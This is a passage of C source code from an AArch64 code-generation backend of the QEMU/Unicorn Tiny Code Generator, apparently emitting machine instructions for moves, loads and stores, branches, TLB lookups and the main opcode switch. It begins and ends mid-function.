/* Look for host pointer values within 4G of the PC. This happens often when loading pointers to QEMU's own data structures. */ if (type == TCG_TYPE_I64) { tcg_target_long disp = value - (intptr_t)s->code_ptr; if (disp == sextract64(disp, 0, 21)) { tcg_out_insn(s, 3406, ADR, rd, disp); return; } disp = (value >> 12) - ((intptr_t)s->code_ptr >> 12); if (disp == sextract64(disp, 0, 21)) { tcg_out_insn(s, 3406, ADRP, rd, disp); if (value & 0xfff) { tcg_out_insn(s, 3401, ADDI, type, rd, rd, value & 0xfff); } return; } } /* Would it take fewer insns to begin with MOVN? */ if (ctpop64(value) >= 32) { t0 = ivalue; opc = I3405_MOVN; } else { t0 = value; opc = I3405_MOVZ; } s0 = ctz64(t0) & (63 & -16); t1 = t0 & ~(0xffffUL << s0); s1 = ctz64(t1) & (63 & -16); t2 = t1 & ~(0xffffUL << s1); if (t2 == 0) { tcg_out_insn_3405(s, opc, type, rd, t0 >> s0, s0); if (t1 != 0) { tcg_out_insn(s, 3405, MOVK, type, rd, value >> s1, s1); } return; } /* For more than 2 insns, dump it into the constant pool. */ new_pool_label(s, value, R_AARCH64_CONDBR19, s->code_ptr, 0); tcg_out_insn(s, 3305, LDR, 0, rd); } /* Define something more legible for general use. */ #define tcg_out_ldst_r tcg_out_insn_3310 static void tcg_out_ldst(TCGContext *s, AArch64Insn insn, TCGReg rd, TCGReg rn, intptr_t offset, int lgsize) { /* If the offset is naturally aligned and in range, then we can use the scaled uimm12 encoding */ if (offset >= 0 && !(offset & ((1 << lgsize) - 1))) { uintptr_t scaled_uimm = offset >> lgsize; if (scaled_uimm <= 0xfff) { tcg_out_insn_3313(s, insn, rd, rn, scaled_uimm); return; } } /* Small signed offsets can use the unscaled encoding. */ if (offset >= -256 && offset < 256) { tcg_out_insn_3312(s, insn, rd, rn, offset); return; } /* Worst-case scenario, move offset to temp register, use reg offset. */ tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_TMP, offset); tcg_out_ldst_r(s, insn, rd, rn, TCG_TYPE_I64, TCG_REG_TMP); } static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { if (ret == arg) { return true; } switch (type) { case TCG_TYPE_I32: case TCG_TYPE_I64: if (ret < 32 && arg < 32) { tcg_out_movr(s, type, ret, arg); break; } else if (ret < 32) { tcg_out_insn(s, 3605, UMOV, type, ret, arg, 0, 0); break; } else if (arg < 32) { tcg_out_insn(s, 3605, INS, 0, ret, arg, 4 << type, 0); break; } /* FALLTHRU */ case TCG_TYPE_V64: tcg_debug_assert(ret >= 32 && arg >= 32); tcg_out_insn(s, 3616, ORR, 0, 0, ret, arg, arg); break; case TCG_TYPE_V128: tcg_debug_assert(ret >= 32 && arg >= 32); tcg_out_insn(s, 3616, ORR, 1, 0, ret, arg, arg); break; default: g_assert_not_reached(); } return true; } static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, TCGReg base, intptr_t ofs) { AArch64Insn insn; int lgsz; switch (type) { case TCG_TYPE_I32: insn = (ret < 32 ? I3312_LDRW : I3312_LDRVS); lgsz = 2; break; case TCG_TYPE_I64: insn = (ret < 32 ? I3312_LDRX : I3312_LDRVD); lgsz = 3; break; case TCG_TYPE_V64: insn = I3312_LDRVD; lgsz = 3; break; case TCG_TYPE_V128: insn = I3312_LDRVQ; lgsz = 4; break; default: g_assert_not_reached(); } tcg_out_ldst(s, insn, ret, base, ofs, lgsz); } static void tcg_out_st(TCGContext *s, TCGType type, TCGReg src, TCGReg base, intptr_t ofs) { AArch64Insn insn; int lgsz; switch (type) { case TCG_TYPE_I32: insn = (src < 32 ? I3312_STRW : I3312_STRVS); lgsz = 2; break; case TCG_TYPE_I64: insn = (src < 32 ? I3312_STRX : I3312_STRVD); lgsz = 3; break; case TCG_TYPE_V64: insn = I3312_STRVD; lgsz = 3; break; case TCG_TYPE_V128: insn = I3312_STRVQ; lgsz = 4; break; default: g_assert_not_reached(); } tcg_out_ldst(s, insn, src, base, ofs, lgsz); } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { if (type <= TCG_TYPE_I64 && val == 0) { tcg_out_st(s, type, TCG_REG_XZR, base, ofs); return true; } return false; } static inline void tcg_out_bfm(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int a, unsigned int b) { tcg_out_insn(s, 3402, BFM, ext, rd, rn, ext, a, b); } static inline void tcg_out_ubfm(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int a, unsigned int b) { tcg_out_insn(s, 3402, UBFM, ext, rd, rn, ext, a, b); } static inline void tcg_out_sbfm(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int a, unsigned int b) { tcg_out_insn(s, 3402, SBFM, ext, rd, rn, ext, a, b); } static inline void tcg_out_extr(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm, unsigned int a) { tcg_out_insn(s, 3403, EXTR, ext, rd, rn, rm, a); } static inline void tcg_out_shl(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int m) { int bits = ext ? 64 : 32; int max = bits - 1; tcg_out_ubfm(s, ext, rd, rn, bits - (m & max), max - (m & max)); } static inline void tcg_out_shr(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int m) { int max = ext ? 63 : 31; tcg_out_ubfm(s, ext, rd, rn, m & max, max); } static inline void tcg_out_sar(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int m) { int max = ext ? 63 : 31; tcg_out_sbfm(s, ext, rd, rn, m & max, max); } static inline void tcg_out_rotr(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int m) { int max = ext ? 63 : 31; tcg_out_extr(s, ext, rd, rn, rn, m & max); } static inline void tcg_out_rotl(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int m) { int bits = ext ? 64 : 32; int max = bits - 1; tcg_out_extr(s, ext, rd, rn, rn, bits - (m & max)); } static inline void tcg_out_dep(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned lsb, unsigned width) { unsigned size = ext ? 64 : 32; unsigned a = (size - lsb) & (size - 1); unsigned b = width - 1; tcg_out_bfm(s, ext, rd, rn, a, b); } static void tcg_out_cmp(TCGContext *s, TCGType ext, TCGReg a, tcg_target_long b, bool const_b) { if (const_b) { /* Using CMP or CMN aliases. */ if (b >= 0) { tcg_out_insn(s, 3401, SUBSI, ext, TCG_REG_XZR, a, b); } else { tcg_out_insn(s, 3401, ADDSI, ext, TCG_REG_XZR, a, -b); } } else { /* Using CMP alias SUBS wzr, Wn, Wm */ tcg_out_insn(s, 3502, SUBS, ext, TCG_REG_XZR, a, b); } } static inline void tcg_out_goto(TCGContext *s, tcg_insn_unit *target) { ptrdiff_t offset = target - s->code_ptr; tcg_debug_assert(offset == sextract64(offset, 0, 26)); tcg_out_insn(s, 3206, B, offset); } static inline void tcg_out_goto_long(TCGContext *s, tcg_insn_unit *target) { ptrdiff_t offset = target - s->code_ptr; if (offset == sextract64(offset, 0, 26)) { tcg_out_insn(s, 3206, BL, offset); } else { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_TMP, (intptr_t)target); tcg_out_insn(s, 3207, BR, TCG_REG_TMP); } } static inline void tcg_out_callr(TCGContext *s, TCGReg reg) { tcg_out_insn(s, 3207, BLR, reg); } static inline void tcg_out_call(TCGContext *s, tcg_insn_unit *target) { ptrdiff_t offset = target - s->code_ptr; if (offset == sextract64(offset, 0, 26)) { tcg_out_insn(s, 3206, BL, offset); } else { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_TMP, (intptr_t)target); tcg_out_callr(s, TCG_REG_TMP); } } void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { tcg_insn_unit i1, i2; TCGType rt = TCG_TYPE_I64; TCGReg rd = TCG_REG_TMP; uint64_t pair; ptrdiff_t offset = addr - jmp_addr; if (offset == sextract64(offset, 0, 26)) { i1 = I3206_B | ((offset >> 2) & 0x3ffffff); i2 = NOP; } else { offset = (addr >> 12) - (jmp_addr >> 12); /* patch ADRP */ i1 = I3406_ADRP | (offset & 3) << 29 | (offset & 0x1ffffc) << (5 - 2) | rd; /* patch ADDI */ i2 = I3401_ADDI | rt << 31 | (addr & 0xfff) << 10 | rd << 5 | rd; } pair = (uint64_t)i2 << 32 | i1; atomic_set((uint64_t *)jmp_addr, pair); flush_icache_range(jmp_addr, jmp_addr + 8); } static inline void tcg_out_goto_label(TCGContext *s, TCGLabel *l) { if (!l->has_value) { tcg_out_reloc(s, s->code_ptr, R_AARCH64_JUMP26, l, 0); tcg_out_insn(s, 3206, B, 0); } else { tcg_out_goto(s, l->u.value_ptr); } } static void tcg_out_brcond(TCGContext *s, TCGType ext, TCGCond c, TCGArg a, TCGArg b, bool b_const, TCGLabel *l) { intptr_t offset; bool need_cmp; if (b_const && b == 0 && (c == TCG_COND_EQ || c == TCG_COND_NE)) { need_cmp = false; } else { need_cmp = true; tcg_out_cmp(s, ext, a, b, b_const); } if (!l->has_value) { tcg_out_reloc(s, s->code_ptr, R_AARCH64_CONDBR19, l, 0); offset = tcg_in32(s) >> 5; } else { offset = l->u.value_ptr - s->code_ptr; tcg_debug_assert(offset == sextract64(offset, 0, 19)); } if (need_cmp) { tcg_out_insn(s, 3202, B_C, c, offset); } else if (c == TCG_COND_EQ) { tcg_out_insn(s, 3201, CBZ, ext, a, offset); } else { tcg_out_insn(s, 3201, CBNZ, ext, a, offset); } } static inline void tcg_out_rev64(TCGContext *s, TCGReg rd, TCGReg rn) { tcg_out_insn(s, 3507, REV64, TCG_TYPE_I64, rd, rn); } static inline void tcg_out_rev32(TCGContext *s, TCGReg rd, TCGReg rn) { tcg_out_insn(s, 3507, REV32, TCG_TYPE_I32, rd, rn); } static inline void tcg_out_rev16(TCGContext *s, TCGReg rd, TCGReg rn) { tcg_out_insn(s, 3507, REV16, TCG_TYPE_I32, rd, rn); } static inline void tcg_out_sxt(TCGContext *s, TCGType ext, MemOp s_bits, TCGReg rd, TCGReg rn) { /* Using ALIASes SXTB, SXTH, SXTW, of SBFM Xd, Xn, #0, #7|15|31 */ int bits = (8 << s_bits) - 1; tcg_out_sbfm(s, ext, rd, rn, 0, bits); } static inline void tcg_out_uxt(TCGContext *s, MemOp s_bits, TCGReg rd, TCGReg rn) { /* Using ALIASes UXTB, UXTH of UBFM Wd, Wn, #0, #7|15 */ int bits = (8 << s_bits) - 1; tcg_out_ubfm(s, 0, rd, rn, 0, bits); } static void tcg_out_addsubi(TCGContext *s, int ext, TCGReg rd, TCGReg rn, int64_t aimm) { if (aimm >= 0) { tcg_out_insn(s, 3401, ADDI, ext, rd, rn, aimm); } else { tcg_out_insn(s, 3401, SUBI, ext, rd, rn, -aimm); } } static inline void tcg_out_addsub2(TCGContext *s, TCGType ext, TCGReg rl, TCGReg rh, TCGReg al, TCGReg ah, tcg_target_long bl, tcg_target_long bh, bool const_bl, bool const_bh, bool sub) { TCGReg orig_rl = rl; AArch64Insn insn; if (rl == ah || (!const_bh && rl == bh)) { rl = TCG_REG_TMP; } if (const_bl) { insn = I3401_ADDSI; if ((bl < 0) ^ sub) { insn = I3401_SUBSI; bl = -bl; } if (unlikely(al == TCG_REG_XZR)) { /* ??? We want to allow al to be zero for the benefit of negation via subtraction. However, that leaves open the possibility of adding 0+const in the low part, and the immediate add instructions encode XSP not XZR. Don't try anything more elaborate here than loading another zero. */ al = TCG_REG_TMP; tcg_out_movi(s, ext, al, 0); } tcg_out_insn_3401(s, insn, ext, rl, al, bl); } else { tcg_out_insn_3502(s, sub ? I3502_SUBS : I3502_ADDS, ext, rl, al, bl); } insn = I3503_ADC; if (const_bh) { /* Note that the only two constants we support are 0 and -1, and that SBC = rn + ~rm + c, so adc -1 is sbc 0, and vice-versa. */ if ((bh != 0) ^ sub) { insn = I3503_SBC; } bh = TCG_REG_XZR; } else if (sub) { insn = I3503_SBC; } tcg_out_insn_3503(s, insn, ext, rh, ah, bh); tcg_out_mov(s, ext, orig_rl, rl); } static inline void tcg_out_mb(TCGContext *s, TCGArg a0) { static const uint32_t sync[] = { [0 ... TCG_MO_ALL] = DMB_ISH | DMB_LD | DMB_ST, [TCG_MO_ST_ST] = DMB_ISH | DMB_ST, [TCG_MO_LD_LD] = DMB_ISH | DMB_LD, [TCG_MO_LD_ST] = DMB_ISH | DMB_LD, [TCG_MO_LD_ST | TCG_MO_LD_LD] = DMB_ISH | DMB_LD, }; tcg_out32(s, sync[a0 & TCG_MO_ALL]); } static void tcg_out_cltz(TCGContext *s, TCGType ext, TCGReg d, TCGReg a0, TCGArg b, bool const_b, bool is_ctz) { TCGReg a1 = a0; if (is_ctz) { a1 = TCG_REG_TMP; tcg_out_insn(s, 3507, RBIT, ext, a1, a0); } if (const_b && b == (ext ? 64 : 32)) { tcg_out_insn(s, 3507, CLZ, ext, d, a1); } else { AArch64Insn sel = I3506_CSEL; tcg_out_cmp(s, ext, a0, 0, 1); tcg_out_insn(s, 3507, CLZ, ext, TCG_REG_TMP, a1); if (const_b) { if (b == -1) { b = TCG_REG_XZR; sel = I3506_CSINV; } else if (b == 0) { b = TCG_REG_XZR; } else { tcg_out_movi(s, ext, d, b); b = d; } } tcg_out_insn_3506(s, sel, ext, d, TCG_REG_TMP, b, TCG_COND_NE); } } #ifdef CONFIG_SOFTMMU #include "../tcg-ldst.inc.c" /* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr, * TCGMemOpIdx oi, uintptr_t ra) */ static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, }; /* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr, * uintxx_t val, TCGMemOpIdx oi, * uintptr_t ra) */ static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; static inline void tcg_out_adr(TCGContext *s, TCGReg rd, void *target) { ptrdiff_t offset = tcg_pcrel_diff(s, target); tcg_debug_assert(offset == sextract64(offset, 0, 21)); tcg_out_insn(s, 3406, ADR, rd, offset); } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); MemOp size = opc & MO_SIZE; if (!reloc_pc19(lb->label_ptr[0], s->code_ptr)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_X0, TCG_AREG0); tcg_out_mov(s, TARGET_LONG_BITS == 64, TCG_REG_X1, lb->addrlo_reg); tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_X2, oi); tcg_out_adr(s, TCG_REG_X3, lb->raddr); tcg_out_call(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SIZE)]); if (opc & MO_SIGN) { tcg_out_sxt(s, lb->type, size, lb->datalo_reg, TCG_REG_X0); } else { tcg_out_mov(s, size == MO_64, lb->datalo_reg, TCG_REG_X0); } tcg_out_goto(s, lb->raddr); return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); MemOp size = opc & MO_SIZE; if (!reloc_pc19(lb->label_ptr[0], s->code_ptr)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_X0, TCG_AREG0); tcg_out_mov(s, TARGET_LONG_BITS == 64, TCG_REG_X1, lb->addrlo_reg); tcg_out_mov(s, size == MO_64, TCG_REG_X2, lb->datalo_reg); tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_X3, oi); tcg_out_adr(s, TCG_REG_X4, lb->raddr); tcg_out_call(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)]); tcg_out_goto(s, lb->raddr); return true; } static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOpIdx oi, TCGType ext, TCGReg data_reg, TCGReg addr_reg, tcg_insn_unit *raddr, tcg_insn_unit *label_ptr) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->type = ext; label->datalo_reg = data_reg; label->addrlo_reg = addr_reg; label->raddr = raddr; label->label_ptr[0] = label_ptr; } /* We expect to use a 7-bit scaled negative offset from ENV. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -512); /* These offsets are built into the LDP below. */ QEMU_BUILD_BUG_ON(offsetof(CPUTLBDescFast, mask) != 0); QEMU_BUILD_BUG_ON(offsetof(CPUTLBDescFast, table) != 8); /* Load and compare a TLB entry, emitting the conditional jump to the slow path for the failure case, which will be patched later when finalizing the slow path. Generated code returns the host addend in X1, clobbers X0,X2,X3,TMP. */ static void tcg_out_tlb_read(TCGContext *s, TCGReg addr_reg, MemOp opc, tcg_insn_unit **label_ptr, int mem_index, bool is_read) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif unsigned a_bits = get_alignment_bits(opc); unsigned s_bits = opc & MO_SIZE; unsigned a_mask = (1u << a_bits) - 1; unsigned s_mask = (1u << s_bits) - 1; TCGReg x3; TCGType mask_type; uint64_t compare_mask; mask_type = (TARGET_PAGE_BITS + CPU_TLB_DYN_MAX_BITS > 32 ? TCG_TYPE_I64 : TCG_TYPE_I32); /* Load env_tlb(env)->f[mmu_idx].{mask,table} into {x0,x1}. */ tcg_out_insn(s, 3314, LDP, TCG_REG_X0, TCG_REG_X1, TCG_AREG0, TLB_MASK_TABLE_OFS(mem_index), 1, 0); /* Extract the TLB index from the address into X0. */ tcg_out_insn(s, 3502S, AND_LSR, mask_type == TCG_TYPE_I64, TCG_REG_X0, TCG_REG_X0, addr_reg, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); /* Add the tlb_table pointer, creating the CPUTLBEntry address into X1. */ tcg_out_insn(s, 3502, ADD, 1, TCG_REG_X1, TCG_REG_X1, TCG_REG_X0); /* Load the tlb comparator into X0, and the fast path addend into X1. */ tcg_out_ld(s, TCG_TYPE_TL, TCG_REG_X0, TCG_REG_X1, is_read ? offsetof(CPUTLBEntry, addr_read) : offsetof(CPUTLBEntry, addr_write)); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_X1, TCG_REG_X1, offsetof(CPUTLBEntry, addend)); /* For aligned accesses, we check the first byte and include the alignment bits within the address. For unaligned access, we check that we don't cross pages using the address of the last byte of the access. */ if (a_bits >= s_bits) { x3 = addr_reg; } else { tcg_out_insn(s, 3401, ADDI, TARGET_LONG_BITS == 64, TCG_REG_X3, addr_reg, s_mask - a_mask); x3 = TCG_REG_X3; } compare_mask = (uint64_t)TARGET_PAGE_MASK | a_mask; /* Store the page mask part of the address into X3. */ tcg_out_logicali(s, I3404_ANDI, TARGET_LONG_BITS == 64, TCG_REG_X3, x3, compare_mask); /* Perform the address comparison. */ tcg_out_cmp(s, TARGET_LONG_BITS == 64, TCG_REG_X0, TCG_REG_X3, 0); /* If not equal, we jump to the slow path. */ *label_ptr = s->code_ptr; tcg_out_insn(s, 3202, B_C, TCG_COND_NE, 0); } #endif /* CONFIG_SOFTMMU */ static void tcg_out_qemu_ld_direct(TCGContext *s, MemOp memop, TCGType ext, TCGReg data_r, TCGReg addr_r, TCGType otype, TCGReg off_r) { const MemOp bswap = memop & MO_BSWAP; switch (memop & MO_SSIZE) { case MO_UB: tcg_out_ldst_r(s, I3312_LDRB, data_r, addr_r, otype, off_r); break; case MO_SB: tcg_out_ldst_r(s, ext ? I3312_LDRSBX : I3312_LDRSBW, data_r, addr_r, otype, off_r); break; case MO_UW: tcg_out_ldst_r(s, I3312_LDRH, data_r, addr_r, otype, off_r); if (bswap) { tcg_out_rev16(s, data_r, data_r); } break; case MO_SW: if (bswap) { tcg_out_ldst_r(s, I3312_LDRH, data_r, addr_r, otype, off_r); tcg_out_rev16(s, data_r, data_r); tcg_out_sxt(s, ext, MO_16, data_r, data_r); } else { tcg_out_ldst_r(s, (ext ? I3312_LDRSHX : I3312_LDRSHW), data_r, addr_r, otype, off_r); } break; case MO_UL: tcg_out_ldst_r(s, I3312_LDRW, data_r, addr_r, otype, off_r); if (bswap) { tcg_out_rev32(s, data_r, data_r); } break; case MO_SL: if (bswap) { tcg_out_ldst_r(s, I3312_LDRW, data_r, addr_r, otype, off_r); tcg_out_rev32(s, data_r, data_r); tcg_out_sxt(s, TCG_TYPE_I64, MO_32, data_r, data_r); } else { tcg_out_ldst_r(s, I3312_LDRSWX, data_r, addr_r, otype, off_r); } break; case MO_Q: tcg_out_ldst_r(s, I3312_LDRX, data_r, addr_r, otype, off_r); if (bswap) { tcg_out_rev64(s, data_r, data_r); } break; default: tcg_abort(); } } static void tcg_out_qemu_st_direct(TCGContext *s, MemOp memop, TCGReg data_r, TCGReg addr_r, TCGType otype, TCGReg off_r) { const MemOp bswap = memop & MO_BSWAP; switch (memop & MO_SIZE) { case MO_8: tcg_out_ldst_r(s, I3312_STRB, data_r, addr_r, otype, off_r); break; case MO_16: if (bswap && data_r != TCG_REG_XZR) { tcg_out_rev16(s, TCG_REG_TMP, data_r); data_r = TCG_REG_TMP; } tcg_out_ldst_r(s, I3312_STRH, data_r, addr_r, otype, off_r); break; case MO_32: if (bswap && data_r != TCG_REG_XZR) { tcg_out_rev32(s, TCG_REG_TMP, data_r); data_r = TCG_REG_TMP; } tcg_out_ldst_r(s, I3312_STRW, data_r, addr_r, otype, off_r); break; case MO_64: if (bswap && data_r != TCG_REG_XZR) { tcg_out_rev64(s, TCG_REG_TMP, data_r); data_r = TCG_REG_TMP; } tcg_out_ldst_r(s, I3312_STRX, data_r, addr_r, otype, off_r); break; default: tcg_abort(); } } static void tcg_out_qemu_ld(TCGContext *s, TCGReg data_reg, TCGReg addr_reg, TCGMemOpIdx oi, TCGType ext) { MemOp memop = get_memop(oi); const TCGType otype = TARGET_LONG_BITS == 64 ? TCG_TYPE_I64 : TCG_TYPE_I32; #ifdef CONFIG_SOFTMMU unsigned mem_index = get_mmuidx(oi); tcg_insn_unit *label_ptr; tcg_out_tlb_read(s, addr_reg, memop, &label_ptr, mem_index, 1); tcg_out_qemu_ld_direct(s, memop, ext, data_reg, TCG_REG_X1, otype, addr_reg); add_qemu_ldst_label(s, true, oi, ext, data_reg, addr_reg, s->code_ptr, label_ptr); #else /* !CONFIG_SOFTMMU */ if (USE_GUEST_BASE) { tcg_out_qemu_ld_direct(s, memop, ext, data_reg, TCG_REG_GUEST_BASE, otype, addr_reg); } else { tcg_out_qemu_ld_direct(s, memop, ext, data_reg, addr_reg, TCG_TYPE_I64, TCG_REG_XZR); } #endif /* CONFIG_SOFTMMU */ } static void tcg_out_qemu_st(TCGContext *s, TCGReg data_reg, TCGReg addr_reg, TCGMemOpIdx oi) { MemOp memop = get_memop(oi); const TCGType otype = TARGET_LONG_BITS == 64 ? TCG_TYPE_I64 : TCG_TYPE_I32; #ifdef CONFIG_SOFTMMU unsigned mem_index = get_mmuidx(oi); tcg_insn_unit *label_ptr; tcg_out_tlb_read(s, addr_reg, memop, &label_ptr, mem_index, 0); tcg_out_qemu_st_direct(s, memop, data_reg, TCG_REG_X1, otype, addr_reg); add_qemu_ldst_label(s, false, oi, (memop & MO_SIZE)== MO_64, data_reg, addr_reg, s->code_ptr, label_ptr); #else /* !CONFIG_SOFTMMU */ if (USE_GUEST_BASE) { tcg_out_qemu_st_direct(s, memop, data_reg, TCG_REG_GUEST_BASE, otype, addr_reg); } else { tcg_out_qemu_st_direct(s, memop, data_reg, addr_reg, TCG_TYPE_I64, TCG_REG_XZR); } #endif /* CONFIG_SOFTMMU */ } static tcg_insn_unit *tb_ret_addr; static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg args[TCG_MAX_OP_ARGS], const int const_args[TCG_MAX_OP_ARGS]) { /* 99% of the time, we can signal the use of extension registers by looking to see if the opcode handles 64-bit data. */ TCGType ext = (s->tcg_op_defs[opc].flags & TCG_OPF_64BIT) != 0; /* Hoist the loads of the most common arguments. */ TCGArg a0 = args[0]; TCGArg a1 = args[1]; TCGArg a2 = args[2]; int c2 = const_args[2]; /* Some operands are defined with "rZ" constraint, a register or the zero register. These need not actually test args[I] == 0. */ #define REG0(I) (const_args[I] ? TCG_REG_XZR : (TCGReg)args[I]) switch (opc) { case INDEX_op_exit_tb: /* Reuse the zeroing that exists for goto_ptr. */ if (a0 == 0) { tcg_out_goto_long(s, s->code_gen_epilogue); } else { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_X0, a0); tcg_out_goto_long(s, tb_ret_addr); } break; case INDEX_op_goto_tb: if (s->tb_jmp_insn_offset != NULL) { /* TCG_TARGET_HAS_direct_jump */ /* Ensure that ADRP+ADD are 8-byte aligned so that an atomic write can be used to patch the target address. */ if ((uintptr_t)s->code_ptr & 7) { tcg_out32(s, NOP); } s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); /* actual branch destination will be patched by tb_target_set_jmp_target later. */ tcg_out_insn(s, 3406, ADRP, TCG_REG_TMP, 0); tcg_out_insn(s, 3401, ADDI, TCG_TYPE_I64, TCG_REG_TMP, TCG_REG_TMP, 0); } else { /* !TCG_TARGET_HAS_direct_jump */ tcg_debug_assert(s->tb_jmp_target_addr != NULL); intptr_t offset = tcg_pcrel_diff(s, (s->tb_jmp_target_addr + a0)) >> 2; tcg_out_insn(s, 3305, LDR, offset, TCG_REG_TMP); } tcg_out_insn(s, 3207, BR, TCG_REG_TMP); set_jmp_reset_offset(s, a0); break; case INDEX_op_goto_ptr: tcg_out_insn(s, 3207, BR, a0); break; case INDEX_op_br: tcg_out_goto_label(s, arg_label(a0)); break; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: tcg_out_ldst(s, I3312_LDRB, a0, a1, a2, 0); break; case INDEX_op_ld8s_i32: tcg_out_ldst(s, I3312_LDRSBW, a0, a1, a2, 0); break; case INDEX_op_ld8s_i64: tcg_out_ldst(s, I3312_LDRSBX, a0, a1, a2, 0); break; case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: tcg_out_ldst(s, I3312_LDRH, a0, a1, a2, 1); break; case INDEX_op_ld16s_i32: tcg_out_ldst(s, I3312_LDRSHW, a0, a1, a2, 1); break; case INDEX_op_ld16s_i64: tcg_out_ldst(s, I3312_LDRSHX, a0, a1, a2, 1); break; case INDEX_op_ld_i32: case INDEX_op_ld32u_i64: tcg_out_ldst(s, I3312_LDRW, a0, a1, a2, 2); break; case INDEX_op_ld32s_i64: tcg_out_ldst(s, I3312_LDRSWX, a0, a1, a2, 2); break; case INDEX_op_ld_i64: tcg_out_ldst(s, I3312_LDRX, a0, a1, a2, 3); break; case INDEX_op_st8_i32: case INDEX_op_st8_i64: tcg_out_ldst(s, I3312_STRB, REG0(0), a1, a2, 0); break; case INDEX_op_st16_i32: case INDEX_op_st16_i64: tcg_out_ldst(s, I3312_STRH, REG0(0), a1, a2, 1); break; case INDEX_op_st_i32: case INDEX_op_st32_i64: tcg_out_ldst(s, I3312_STRW, REG0(0), a1, a2, 2); break; case INDEX_op_st_i64: tcg_out_ldst(s, I3312_STRX, REG0(0), a1, a2, 3); break; case INDEX_op_add_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_add_i64: if (c2) { tcg_out_addsubi(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3502, ADD, ext, a0, a1, a2); } break; case INDEX_op_sub_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_sub_i64: if (c2) { tcg_out_addsubi(s, ext, a0, a1, -a2); } else { tcg_out_insn(s, 3502, SUB, ext, a0, a1, a2); } break; case INDEX_op_neg_i64: case INDEX_op_neg_i32: tcg_out_insn(s, 3502, SUB, ext, a0, TCG_REG_XZR, a1); break; case INDEX_op_and_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_and_i64: if (c2) { tcg_out_logicali(s, I3404_ANDI, ext, a0, a1, a2); } else { tcg_out_insn(s, 3510, AND, ext, a0, a1, a2); } break; case INDEX_op_andc_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_andc_i64: if (c2) { tcg_out_logicali(s, I3404_ANDI, ext, a0, a1, ~a2); } else { tcg_out_insn(s, 3510, BIC, ext, a0, a1, a2); } break; case INDEX_op_or_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_or_i64: if (c2) { tcg_out_logicali(s, I3404_ORRI, ext, a0, a1, a2); } else { tcg_out_insn(s, 3510, ORR, ext, a0, a1, a2); } break; case INDEX_op_orc_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_orc_i64: if (c2) { tcg_out_logicali(s, I3404_ORRI, ext, a0, a1, ~a2); } else { tcg_out_insn(s, 3510, ORN, ext, a0, a1, a2); } break; case INDEX_op_xor_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_xor_i64: if (c2) { tcg_out_logicali(s, I3404_EORI, ext, a0, a1, a2); } else { tcg_out_insn(s, 3510, EOR, ext, a0, a1, a2); } break; case INDEX_op_eqv_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_eqv_i64: if (c2) { tcg_out_logicali(s, I3404_EORI, ext, a0, a1, ~a2); } else { 